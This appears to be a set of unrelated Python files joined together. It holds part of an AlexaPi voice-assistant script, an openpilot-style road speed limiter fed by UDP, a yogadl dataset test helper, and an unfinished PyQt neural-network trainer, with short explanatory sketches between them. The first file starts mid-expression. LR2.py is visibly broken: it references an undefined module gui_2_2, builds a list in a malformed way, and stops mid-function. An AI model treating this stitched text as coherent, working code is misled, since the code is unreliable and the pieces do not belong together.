+ config['platform']['device'] + 'platform', package=None) cl = getattr(im, config['platform']['device'].capitalize() + 'Platform') platform = cl(config) class Player(object): config = None platform = None pHandler = None tunein_parser = None navigation_token = None playlist_last_item = None progressReportRequired = [] def __init__(self, config, platform, pHandler): # pylint: disable=redefined-outer-name self.config = config self.platform = platform self.pHandler = pHandler # pylint: disable=invalid-name self.tunein_parser = tunein.TuneIn(5000) def play_playlist(self, payload): self.navigation_token = payload['navigationToken'] self.playlist_last_item = payload['audioItem']['streams'][-1]['streamId'] for stream in payload['audioItem']['streams']: # pylint: disable=redefined-outer-name streamId = stream['streamId'] if stream['progressReportRequired']: self.progressReportRequired.append(streamId) url = stream['streamUrl'] if stream['streamUrl'].startswith("cid:"): url = "file://" + tmp_path + stream['streamUrl'].lstrip("cid:") + ".mp3" if (url.find('radiotime.com') != -1): url = self.tunein_playlist(url) self.pHandler.queued_play(mrl_fix(url), stream['offsetInMilliseconds'], audio_type='media', stream_id=streamId) def play_speech(self, mrl): self.stop() self.pHandler.blocking_play(mrl) def stop(self): self.pHandler.stop() def is_playing(self): return self.pHandler.is_playing() def get_volume(self): return self.pHandler.volume def set_volume(self, volume): self.pHandler.set_volume(volume) def playback_callback(self, requestType, playerActivity, streamId): if (requestType == RequestType.STARTED) and (playerActivity == PlayerActivity.PLAYING): self.platform.indicate_playback() elif (requestType in [RequestType.INTERRUPTED, RequestType.FINISHED, RequestType.ERROR]) and (playerActivity == PlayerActivity.IDLE): self.platform.indicate_playback(False) if streamId: if streamId in self.progressReportRequired: self.progressReportRequired.remove(streamId) gThread = threading.Thread(target=alexa_playback_progress_report_request, args=(requestType, playerActivity, streamId)) gThread.start() if (requestType == RequestType.FINISHED) and (playerActivity == PlayerActivity.IDLE) and (self.playlist_last_item == streamId): gThread = threading.Thread(target=alexa_getnextitem, args=(self.navigation_token,)) self.navigation_token = None gThread.start() def tunein_playlist(self, url): logger.debug("TUNE IN URL = %s", url) req = requests.get(url) lines = req.content.decode().split('\n') nurl = self.tunein_parser.parse_stream_url(lines[0]) if nurl: return nurl[0] return "" # Playback handler def playback_callback(requestType, playerActivity, streamId): return player.playback_callback(requestType, playerActivity, streamId) im = importlib.import_module('alexapi.playback_handlers.' 
+ config['sound']['playback_handler'] + "handler", package=None) cl = getattr(im, config['sound']['playback_handler'].capitalize() + 'Handler') pHandler = cl(config, playback_callback) player = Player(config, platform, pHandler) path = os.path.realpath(__file__).rstrip(os.path.basename(__file__)) resources_path = os.path.join(path, 'resources', '') tmp_path = os.path.join(tempfile.mkdtemp(prefix='AlexaPi-runtime-'), '') MAX_VOLUME = 100 MIN_VOLUME = 30 def mrl_fix(url): if ('#' in url) and url.startswith('file://'): new_url = url.replace('#', '.hashMark.') os.rename(url.replace('file://', ''), new_url.replace('file://', '')) url = new_url return url def internet_on(): try: requests.get('https://api.amazon.com/auth/o2/token') logger.info("Connection OK") return True except requests.exceptions.RequestException: logger.error("Connection Failed") return False class Token(object): _token = '' _timestamp = None _validity = 3570 def __init__(self, aconfig): self._aconfig = aconfig if not self._aconfig.get('refresh_token'): logger.critical("AVS refresh_token not found in the configuration file. " "Run the setup again to fix your installation (see project wiki for installation instructions).") raise ConfigurationException self.renew() def __str__(self): if (not self._timestamp) or (time.time() - self._timestamp > self._validity): logger.debug("AVS token: Expired") self.renew() return self._token def renew(self): logger.info("AVS token: Requesting a new one") payload = { "client_id": self._aconfig['Client_ID'], "client_secret": self._aconfig['Client_Secret'], "refresh_token": self._aconfig['refresh_token'], "grant_type": "refresh_token" } url = "https://api.amazon.com/auth/o2/token" try: response = requests.post(url, data=payload) resp = json.loads(response.text) self._token = resp['access_token'] self._timestamp = time.time() logger.info("AVS token: Obtained successfully") except requests.exceptions.RequestException as exp: logger.critical("AVS token: Failed to obtain a token: " + str(exp)) # from https://github.com/respeaker/Alexa/blob/master/alexa.py def alexa_speech_recognizer_generate_data(audio, boundary): """ Generate a iterator for chunked transfer-encoding request of Alexa Voice Service Args: audio: raw 16 bit LSB audio data boundary: boundary of multipart content Returns: """ logger.debug('Start sending speech to Alexa Voice Service') chunk = '--%s\r\n' % boundary chunk += ( 'Content-Disposition: form-data; name="request"\r\n' 'Content-Type: application/json; charset=UTF-8\r\n\r\n' ) data = { "messageHeader": { "deviceContext": [{ "name": "playbackState", "namespace": "AudioPlayer", "payload": { "streamId": "", "offsetInMilliseconds": "0", "playerActivity": "IDLE" } }] }, "messageBody": { "profile": "alexa-close-talk", "locale": "en-us", "format": "audio/L16; rate=16000; channels=1" } } yield bytes(chunk + json.dumps(data) + '\r\n', 'utf8') chunk = '--%s\r\n' % boundary chunk += ( 'Content-Disposition: form-data; name="audio"\r\n' 'Content-Type: audio/L16; rate=16000; channels=1\r\n\r\n' ) yield bytes(chunk, 'utf8') for audio_chunk in audio: yield audio_chunk yield bytes('--%s--\r\n' % boundary, 'utf8') logger.debug('Finished sending speech to Alexa Voice Service') platform.indicate_processing() def alexa_speech_recognizer(audio_stream): # https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/speechrecognizer-requests url = 'https://access-alexa-na.amazon.com/v1/avs/speechrecognizer/recognize' boundary = 'this-is-a-boundary' headers = { 'Authorization': 'Bearer %s' % 
token, 'Content-Type': 'multipart/form-data; boundary=%s' % boundary, 'Transfer-Encoding': 'chunked', } data = alexa_speech_recognizer_generate_data(audio_stream, boundary) resp = requests.post(url, headers=headers, data=data) platform.indicate_processing(False) process_response(resp) def alexa_getnextitem(navigationToken): # https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-getnextitem-request logger.debug("Sending GetNextItem Request...") url = 'https://access-alexa-na.amazon.com/v1/avs/audioplayer/getNextItem' headers = { 'Authorization': 'Bearer %s' % token, 'content-type': 'application/json; charset=UTF-8' } data = { "messageHeader": {}, "messageBody": { "navigationToken": navigationToken } } response = requests.post(url, headers=headers, data=json.dumps(data)) process_response(response) def alexa_playback_progress_report_request(requestType, playerActivity, stream_id): # https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-events-requests # streamId Specifies the identifier for the current stream. # offsetInMilliseconds Specifies the current position in the track, in milliseconds. # playerActivity IDLE, PAUSED, or PLAYING logger.debug("Sending Playback Progress Report Request...") headers = { 'Authorization': 'Bearer %s' % token } data = { "messageHeader": {}, "messageBody": { "playbackState": { "streamId": stream_id, "offsetInMilliseconds": 0, "playerActivity": playerActivity.upper() } } } if requestType.upper() == RequestType.ERROR: # The Playback Error method sends a notification to AVS that the audio player has experienced an issue during playback. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackError" elif requestType.upper() == RequestType.FINISHED: # The Playback Finished method sends a notification to AVS that the audio player has completed playback. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackFinished" elif requestType.upper() == PlayerActivity.IDLE: # This is an error as described in https://github.com/alexa-pi/AlexaPi/issues/117 # The Playback Idle method sends a notification to AVS that the audio player has reached the end of the playlist. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackIdle" elif requestType.upper() == RequestType.INTERRUPTED: # The Playback Interrupted method sends a notification to AVS that the audio player has been interrupted. # Note: The audio player may have been interrupted by a previous stop Directive. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackInterrupted" elif requestType.upper() == "PROGRESS_REPORT": # The Playback Progress Report method sends a notification to AVS with the current state of the audio player. url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackProgressReport" elif requestType.upper() == RequestType.STARTED: # The Playback Started method sends a notification to AVS that the audio player has started playing. 
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackStarted" response = requests.post(url, headers=headers, data=json.dumps(data)) if response.status_code != 204: logger.warning("(alexa_playback_progress_report_request Response) %s", response) else: logger.debug("Playback Progress Report was Successful") def process_response(response): logger.debug("Processing Request Response...") if response.status_code == 200: try: data = bytes("Content-Type: ", 'utf-8') + bytes(response.headers['content-type'], 'utf-8') + bytes('\r\n\r\n', 'utf-8') + response.content msg = email.message_from_bytes(data) # pylint: disable=no-member except AttributeError: data = "Content-Type: " + response.headers['content-type'] + '\r\n\r\n' + response.content msg = email.message_from_string(data) for payload in msg.get_payload(): if payload.get_content_type() == "application/json": j = json.loads(payload.get_payload()) logger.debug("JSON String Returned: %s", json.dumps(j, indent=2)) elif payload.get_content_type() == "audio/mpeg": filename = tmp_path + payload.get('Content-ID').strip("<>") + ".mp3" with open(filename, 'wb') as f: f.write(payload.get_payload(decode=True)) else: logger.debug("NEW CONTENT TYPE RETURNED: %s", payload.get_content_type()) # Now process the response if 'directives' in j['messageBody']: if not j['messageBody']['directives']: logger.debug("0 Directives received") for directive in j['messageBody']['directives']: if directive['namespace'] == 'SpeechSynthesizer': if directive['name'] == 'speak': player.play_speech(mrl_fix("file://" + tmp_path + directive['payload']['audioContent'].lstrip("cid:") + ".mp3")) elif directive['namespace'] == 'SpeechRecognizer': if directive['name'] == 'listen': logger.debug("Further Input Expected, timeout in: %sms", directive['payload']['timeoutIntervalInMillis']) player.play_speech(resources_path + 'beep.wav') timeout = directive['payload']['timeoutIntervalInMillis'] / 116 audio_stream = capture.silence_listener(timeout) # now process the response alexa_speech_recognizer(audio_stream) elif directive['namespace'] == 'AudioPlayer': if directive['name'] == 'play': player.play_playlist(directive['payload']) elif directive['namespace'] == "Speaker": # speaker control such as volume if directive['name'] == 'SetVolume': vol_token = directive['payload']['volume'] type_token = directive['payload']['adjustmentType'] if (type_token == 'relative'): volume = player.get_volume() + int(vol_token) else: volume = int(vol_token) if (volume > MAX_VOLUME): volume = MAX_VOLUME elif (volume < MIN_VOLUME): volume = MIN_VOLUME player.set_volume(volume) logger.debug("new volume = %s", volume) # Additional Audio Iten elif 'audioItem' in j['messageBody']: player.play_playlist(j['messageBody']) return elif response.status_code == 204: logger.debug("Request Response is null (This is OKAY!)") else: logger.info("(process_response Error) Status Code: %s", response.status_code) response.connection.close() platform.indicate_failure() trigger_thread = None def trigger_callback(trigger): global trigger_thread logger.info("Triggered: %s", trigger.name) triggers.disable() trigger_thread = threading.Thread(target=trigger_process, args=(trigger,)) trigger_thread.setDaemon(True) trigger_thread.start() def trigger_process(trigger): if player.is_playing(): player.stop() # clean up the temp directory if not debug: for some_file in os.listdir(tmp_path): file_path = os.path.join(tmp_path, some_file) try: if os.path.isfile(file_path): os.remove(file_path) except Exception as exp: # pylint: 
disable=broad-except logger.warning(exp) if event_commands['pre_interaction']: subprocess.Popen(event_commands['pre_interaction'], shell=True, stdout=subprocess.PIPE) force_record = None if trigger.event_type in triggers.types_continuous: force_record = (trigger.continuous_callback, trigger.event_type in triggers.types_vad) if trigger.voice_confirm: player.play_speech(resources_path + 'alexayes.mp3') audio_stream = capture.silence_listener(force_record=force_record) alexa_speech_recognizer(audio_stream) triggers.enable() if event_commands['post_interaction']: subprocess.Popen(event_commands['post_interaction'], shell=True, stdout=subprocess.PIPE) def cleanup(signal, frame): # pylint: disable=redefined-outer-name,unused-argument triggers.disable() capture.cleanup() pHandler.cleanup() platform.cleanup() shutil.rmtree(tmp_path) if event_commands['shutdown']: subprocess.Popen(event_commands['shutdown'], shell=True, stdout=subprocess.PIPE) sys.exit(0) if __name__ == "__main__": if event_commands['startup']: subprocess.Popen(event_commands['startup'], shell=True, stdout=subprocess.PIPE) try: capture = alexapi.capture.Capture(config, tmp_path) except ConfigurationException as exp: logger.critical(exp) sys.exit(1) capture.setup(platform.indicate_recording) triggers.init(config, trigger_callback, capture) triggers.setup() pHandler.setup() platform.setup() for sig in (signal.SIGABRT, signal.SIGILL, signal.SIGINT, signal.SIGSEGV, signal.SIGTERM): signal.signal(sig, cleanup) logger.info("Checking Internet Connection ...") while not internet_on(): time.sleep(1) try: token = Token(config['alexa']) if not str(token): raise RuntimeError except (ConfigurationException, RuntimeError): platform.indicate_failure() sys.exit(1) platform_trigger_callback = triggers.triggers['platform'].platform_callback if 'platform' in triggers.triggers else None platform.after_setup(platform_trigger_callback) triggers.enable() if not silent: player.play_speech(resources_path + "hello.mp3") platform.indicate_success() while True: time.sleep(1)
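Worth isolating from main.py above is the Token class's lazy-renewal pattern: the cached access token is refreshed whenever it is older than its validity window, so callers simply interpolate str(token) into request headers. A minimal sketch of that flow under the same assumptions (Amazon's OAuth endpoint, placeholder credentials — not a drop-in for the class above):

import time

import requests


class ExpiringToken:
    """Caches an OAuth access token and renews it via a refresh token."""

    VALIDITY_SEC = 3570  # renew slightly before the nominal 3600 s expiry

    def __init__(self, client_id, client_secret, refresh_token):
        self._creds = {
            "client_id": client_id,
            "client_secret": client_secret,
            "refresh_token": refresh_token,
            "grant_type": "refresh_token",
        }
        self._token = ""
        self._timestamp = None

    def __str__(self):
        # Renew transparently when the cached token has gone stale.
        if self._timestamp is None or time.time() - self._timestamp > self.VALIDITY_SEC:
            self.renew()
        return self._token

    def renew(self):
        resp = requests.post("https://api.amazon.com/auth/o2/token", data=self._creds)
        self._token = resp.json()["access_token"]
        self._timestamp = time.time()

# Usage mirrors the file above: headers = {'Authorization': 'Bearer %s' % token}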
road_speed_limiter.py
import json
import select
import threading
import time
import socket
import fcntl
import struct

from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import interp

CAMERA_SPEED_FACTOR = 1.05


class Port:
  BROADCAST_PORT = 2899
  RECEIVE_PORT = 843
  LOCATION_PORT = 2911


class RoadLimitSpeedServer:
  def __init__(self):
    self.json_road_limit = None
    self.active = 0
    self.last_updated = 0
    self.last_updated_active = 0
    self.last_exception = None
    self.lock = threading.Lock()
    self.remote_addr = None

    broadcast = Thread(target=self.broadcast_thread, args=[])
    broadcast.setDaemon(True)
    broadcast.start()

    #gps = Thread(target=self.gps_thread, args=[])
    #gps.setDaemon(True)
    #gps.start()

  def gps_thread(self):
    sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
      while True:
        try:
          sm.update()
          if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
            location = sm['gpsLocationExternal']
            json_location = json.dumps([
              location.latitude,
              location.longitude,
              location.altitude,
              location.speed,
              location.bearingDeg,
              location.accuracy,
              location.timestamp,
              location.source,
              location.vNED,
              location.verticalAccuracy,
              location.bearingAccuracyDeg,
              location.speedAccuracy,
            ])
            address = (self.remote_addr[0], Port.LOCATION_PORT)
            sock.sendto(json_location.encode(), address)
          else:
            time.sleep(1.)
        except Exception as e:
          print("exception", e)
          time.sleep(1.)

  def get_broadcast_address(self):
    try:
      s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
      ip = fcntl.ioctl(
        s.fileno(),
        0x8919,
        struct.pack('256s', 'wlan0'.encode('utf-8'))
      )[20:24]
      return socket.inet_ntoa(ip)
    except:
      return None

  def broadcast_thread(self):
    broadcast_address = None
    frame = 0

    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
      try:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
        while True:
          try:
            if broadcast_address is None or frame % 10 == 0:
              broadcast_address = self.get_broadcast_address()

            print('broadcast_address', broadcast_address)

            if broadcast_address is not None:
              address = (broadcast_address, Port.BROADCAST_PORT)
              sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
          except:
            pass

          time.sleep(5.)
          frame += 1
      except:
        pass

  def udp_recv(self, sock):
    ret = False
    try:
      ready = select.select([sock], [], [], 1.)
      ret = bool(ready[0])
      if ret:
        data, self.remote_addr = sock.recvfrom(2048)
        json_obj = json.loads(data.decode())

        try:
          self.lock.acquire()
          try:
            if 'active' in json_obj:
              self.active = json_obj['active']
              self.last_updated_active = time.monotonic()
          except:
            pass

          if 'road_limit' in json_obj:
            self.json_road_limit = json_obj['road_limit']
            self.last_updated = time.monotonic()
        finally:
          self.lock.release()
    except:
      try:
        self.lock.acquire()
        self.json_road_limit = None
      finally:
        self.lock.release()

    return ret

  def check(self):
    now = time.monotonic()
    if now - self.last_updated > 20.:
      try:
        self.lock.acquire()
        self.json_road_limit = None
      finally:
        self.lock.release()

    if now - self.last_updated_active > 10.:
      self.active = 0

  def get_limit_val(self, key, default=None):
    if self.json_road_limit is None:
      return default
    if key in self.json_road_limit:
      return self.json_road_limit[key]
    return default


def main():
  server = RoadLimitSpeedServer()
  roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')

  with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
    try:
      sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
      sock.setblocking(False)

      while True:
        if server.udp_recv(sock):
          dat = messaging.new_message()
          dat.init('roadLimitSpeed')
          dat.roadLimitSpeed.active = server.active
          dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
          dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
          dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
          dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
          dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
          dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
          dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
          roadLimitSpeed.send(dat.to_bytes())

        server.check()
    except Exception as e:
      server.last_exception = e


class RoadSpeedLimiter:
  def __init__(self):
    self.slowing_down = False
    self.start_dist = 0
    self.longcontrol = Params().get_bool('LongControlEnabled')

    self.sock = messaging.sub_sock("roadLimitSpeed")
    self.roadLimitSpeed = None

  def recv(self):
    try:
      dat = messaging.recv_sock(self.sock, wait=False)
      if dat is not None:
        self.roadLimitSpeed = dat.roadLimitSpeed
    except:
      pass

  def get_active(self):
    self.recv()
    if self.roadLimitSpeed is not None:
      return self.roadLimitSpeed.active
    return 0

  def get_max_speed(self, CS, v_cruise_speed):
    log = ""
    self.recv()

    if self.roadLimitSpeed is None:
      return 0, 0, 0, False, ""

    try:
      road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
      is_highway = self.roadLimitSpeed.isHighway

      cam_type = int(self.roadLimitSpeed.camType)

      cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
      cam_limit_speed = self.roadLimitSpeed.camLimitSpeed

      section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
      section_left_dist = self.roadLimitSpeed.sectionLeftDist

      if is_highway is not None:
        if is_highway:
          MIN_LIMIT = 40
          MAX_LIMIT = 120
        else:
          MIN_LIMIT = 30
          MAX_LIMIT = 100
      else:
        MIN_LIMIT = 30
        MAX_LIMIT = 120

      # log = "RECV: " + str(is_highway)
      # log += ", " + str(cam_limit_speed)
      # log += ", " + str(cam_limit_speed_left_dist)
      # log += ", " + str(section_limit_speed)
      # log += ", " + str(section_left_dist)

      v_ego = CS.clu11["CF_Clu_Vanz"] / 3.6

      if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
        diff_speed = v_ego * 3.6 - cam_limit_speed

        if self.longcontrol:
          sec = interp(diff_speed, [10., 30.], [12., 17.])
        else:
          sec = interp(diff_speed, [10., 30.], [14., 19.])

        if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < v_ego * sec):
          if not self.slowing_down:
            self.start_dist = cam_limit_speed_left_dist * 1.2
            self.slowing_down = True
            first_started = True
          else:
            first_started = False

          base = self.start_dist / 1.2 * 0.65
          td = self.start_dist - base
          d = cam_limit_speed_left_dist - base

          if d > 0 and td > 0. and diff_speed > 0 and (section_left_dist is None or section_left_dist < 10):
            pp = d / td
          else:
            pp = 0

          return cam_limit_speed * CAMERA_SPEED_FACTOR + int(pp * diff_speed), \
                 cam_limit_speed, cam_limit_speed_left_dist, first_started, log

        self.slowing_down = False
        return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log

      elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
        if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
          if not self.slowing_down:
            self.slowing_down = True
            first_started = True
          else:
            first_started = False

          return section_limit_speed, section_limit_speed, section_left_dist, first_started, log

        self.slowing_down = False
        return 0, section_limit_speed, section_left_dist, False, log

    except Exception as e:
      log = "Ex: " + str(e)
      pass

    self.slowing_down = False
    return 0, 0, 0, False, log


road_speed_limiter = None


def road_speed_limiter_get_active():
  global road_speed_limiter
  if road_speed_limiter is None:
    road_speed_limiter = RoadSpeedLimiter()
  return road_speed_limiter.get_active()


def road_speed_limiter_get_max_speed(CS, v_cruise_speed):
  global road_speed_limiter
  if road_speed_limiter is None:
    road_speed_limiter = RoadSpeedLimiter()
  return road_speed_limiter.get_max_speed(CS, v_cruise_speed)


if __name__ == "__main__":
  main()
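The core of udp_recv above is polling a non-blocking UDP socket with a one-second select() timeout, so the receive loop can interleave with the staleness checks in check(). A self-contained loopback sketch of that polling pattern (the port number is illustrative; any free port works):

import json
import select
import socket

# Receiver: non-blocking UDP socket, polled via select() with a timeout.
recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recv_sock.bind(('127.0.0.1', 2899))
recv_sock.setblocking(False)

# Sender: fire one JSON datagram at the receiver over loopback.
send_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
send_sock.sendto(json.dumps({'active': 1}).encode(), ('127.0.0.1', 2899))

# select() waits at most 1 s for readability, so a loop built on this
# never blocks indefinitely between housekeeping passes.
ready, _, _ = select.select([recv_sock], [], [], 1.)
if ready:
    data, remote_addr = recv_sock.recvfrom(2048)
    print('from', remote_addr, json.loads(data.decode()))

recv_sock.close()
send_sock.close()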
util.py
# Copyright 2020 Determined AI. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================

import asyncio
import threading
from typing import Optional

import boto3
import google.cloud.storage as google_storage
import numpy as np
import tensorflow as tf
import tensorflow_datasets as tfds

from yogadl import rw_coordinator, storage


def make_mnist_test_dataset() -> tf.data.Dataset:
    mnist_builder = tfds.builder("mnist")
    mnist_builder.download_and_prepare()
    # We use test because for tfds version < 1.3 the
    # train split is automatically shuffled, breaking
    # the test.
    mnist_test = mnist_builder.as_dataset(split="test")
    return mnist_test


def cleanup_lfs_storage(
    configurations: storage.LFSConfigurations, dataset_id: str, dataset_version: str
) -> None:
    cache_filepath = (
        configurations.storage_dir_path.joinpath(dataset_id)
        .joinpath(dataset_version)
        .joinpath("cache.mdb")
    )
    if cache_filepath.exists():
        cache_filepath.unlink()


def cleanup_gcs_storage(
    configurations: storage.GCSConfigurations, dataset_id: str, dataset_version: str
) -> None:
    gcs_cache_filepath = (
        configurations.bucket_directory_path.joinpath(dataset_id)
        .joinpath(dataset_version)
        .joinpath("cache.mdb")
    )
    client = google_storage.Client()
    bucket = client.bucket(configurations.bucket)
    blob = bucket.blob(str(gcs_cache_filepath))
    if blob.exists():
        blob.delete()


def cleanup_s3_storage(
    configurations: storage.S3Configurations, dataset_id: str, dataset_version: str
) -> None:
    s3_cache_filepath = (
        configurations.bucket_directory_path.joinpath(dataset_id)
        .joinpath(dataset_version)
        .joinpath("cache.mdb")
    )
    client = boto3.client("s3")
    client.delete_object(Bucket=configurations.bucket, Key=str(s3_cache_filepath))


class AccessServerHandler:
    def __init__(self, hostname: str, port: int) -> None:
        self._access_server = rw_coordinator.RwCoordinatorServer(hostname=hostname, port=port)
        self._thread_running_server = None  # type: Optional[threading.Thread]

    def run_server_in_thread(self) -> None:
        asyncio.get_event_loop().run_until_complete(self._access_server.run_server())
        self._thread_running_server = threading.Thread(target=asyncio.get_event_loop().run_forever)
        self._thread_running_server.start()

    def stop_server(self) -> None:
        self._access_server.stop_server()
        assert self._thread_running_server
        self._thread_running_server.join()


def compare_datasets_graph_mode(
    original_dataset: tf.data.Dataset, dataset_from_stream: tf.data.Dataset
) -> int:
    next_element_from_stream = dataset_from_stream.make_one_shot_iterator().get_next()
    next_element_from_orig = original_dataset.make_one_shot_iterator().get_next()
    data_samples = 0

    with tf.Session() as sess:
        while True:
            try:
                element_from_stream = sess.run(next_element_from_stream)
                element_from_dataset = sess.run(next_element_from_orig)
                assert element_from_stream["label"] == element_from_dataset["label"]
                assert np.array_equal(element_from_stream["image"], element_from_dataset["image"])
                data_samples += 1
            except tf.errors.OutOfRangeError:
                break

    return data_samples


def compare_datasets_eager_mode(
    original_dataset: tf.data.Dataset, dataset_from_stream: tf.data.Dataset
) -> int:
    next_element_from_stream = dataset_from_stream.as_numpy_iterator()
    next_element_from_orig = original_dataset.as_numpy_iterator()
    data_samples = 0

    for orig_dict, from_stream_dict in zip(next_element_from_orig, next_element_from_stream):
        for orig_data, from_stream_data in zip(orig_dict, from_stream_dict):
            assert np.array_equal(orig_data, from_stream_data)
        data_samples += 1

    return data_samples


def compare_datasets(
    original_dataset: tf.data.Dataset, dataset_from_stream: tf.data.Dataset
) -> int:
    if tf.executing_eagerly():
        return compare_datasets_eager_mode(original_dataset, dataset_from_stream)
    else:
        return compare_datasets_graph_mode(original_dataset, dataset_from_stream)
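AccessServerHandler above starts the coordinator, then keeps an asyncio event loop spinning on a background thread so the server stays responsive while the calling thread proceeds. A minimal stdlib-only sketch of that run-loop-in-a-thread pattern, including the threadsafe shutdown that stop_server() relies on:

import asyncio
import threading

# Start an event loop on a worker thread; run_forever keeps it alive
# until it is explicitly stopped.
loop = asyncio.new_event_loop()
thread = threading.Thread(target=loop.run_forever)
thread.start()


async def work():
    await asyncio.sleep(0.1)
    return "done"


# Hand a coroutine to the loop running in the other thread and wait
# for its result from this thread.
future = asyncio.run_coroutine_threadsafe(work(), loop)
print(future.result(timeout=5))

# Mirror stop_server(): stop the loop from outside it, then join.
loop.call_soon_threadsafe(loop.stop)
thread.join()
loop.close()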
LR2.py
""" Licensed under the Unlicense License; you may not use this file except in compliance with the License. You may obtain a copy of the License at https://unlicense.org Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import csv import threading import numpy as np import cv2 import sys from PyQt5 import QtWidgets import random from PyQt5.QtGui import QPixmap from PyQt5.QtGui import QPalette, QColor import qimage2ndarray import pickle import json import gui_2 def sigmoid(x): return 1 / (1 + np.exp(-x)) def dot_0_layer(input_layer, synaptic_weights): return layer_0_activator(np.dot(input_layer, synaptic_weights.T)) def valmap(value, istart, istop, ostart, ostop): return ostart + (ostop - ostart) * ((value - istart) / (istop - istart)) def layer_0_activator(weights_sum): # THE ASS IS COMING # return max(0, weights_sum) result = [[0] * weights_sum[0]] * weights_sum for i in range(len(weights_sum)): sample_result = [0] * weights_sum[0] for k in range(len(weights_sum[i])): threshold = 1.8 # 1.79 if weights_sum[i][k] >= threshold: sample_result[k] = weights_sum[i][k] - 2.2 # 0.79 # weights_sum[i][k] - 1.6 # weights_sum[i][k] - 2.1 else: sample_result[k] = 0 # sample_result[k] = max(2, weights_sum[i][k] - 2) result[i] = sample_result result = np.array(result) # print(result) # exit(0) return np.array(result) class CollectorApp(QtWidgets.QMainWindow, gui_2_2.Ui_MainWindow): def __init__(self): super().__init__() self.setupUi(self) self.btn_load_train_array.clicked.connect(self.load_train_array) self.btn_start_training.clicked.connect(self.start_training) self.btn_load_test_array.clicked.connect(self.load_test_array) self.btn_predict.clicked.connect(self.predict_test_image) self.btn_save_to_file.clicked.connect(self.save_to_file) self.btn_load_from_file.clicked.connect(self.load_from_file) self.test_values = False self.synaptic_weights_0 = np.array([]) self.synaptic_weights_1 = np.array([]) self.train_images = np.array([]) self.train_labels = np.array([]) self.test_array = np.array([]) self.test_labels = np.array([]) self.test_image = None def load_train_data(self, debug, folder): train_images = [] train_labels = [] for i in range(4): train_data_temp = cv2.cvtColor(cv2.imread(folder + str(i) + '.bmp'), cv2.COLOR_BGR2GRAY) / 255.0 for x in range(32): # 32 for y in range(32): # 32 temp_data = train_data_temp[y: y + 16, x: x + 16].flatten() train_images.append(temp_data) train_labels.append(i) combined_lists = list(zip(train_images, train_labels)) random.shuffle(combined_lists) train_images, train_labels = zip(*combined_lists) self.train_images = np.array(train_images) self.train_labels = np.array([train_labels]) # TEST VALUES if self.test_values: self.train_images = [] self.train_labels = [] for _ in range(50): a = [] b = [] for _ in range(8): a.append(random.randrange(0, 10) / 10) b.append(a[0] + a[1]) b.append(a[2] + a[3]) b.append(a[4] + a[5]) b.append(a[6] + a[7]) self.train_labels.append(np.argmax(b)) self.train_images.append(a) self.train_images = np.array(self.train_images) self.train_labels = np.array([self.train_labels]) if debug: print('-------------------- TRAIN DATA --------------------') print('Shape of train_images: ' + str(self.train_images.shape)) print('Shape of train_labels: ' + str(self.train_labels.shape)) print('Arrays:') 
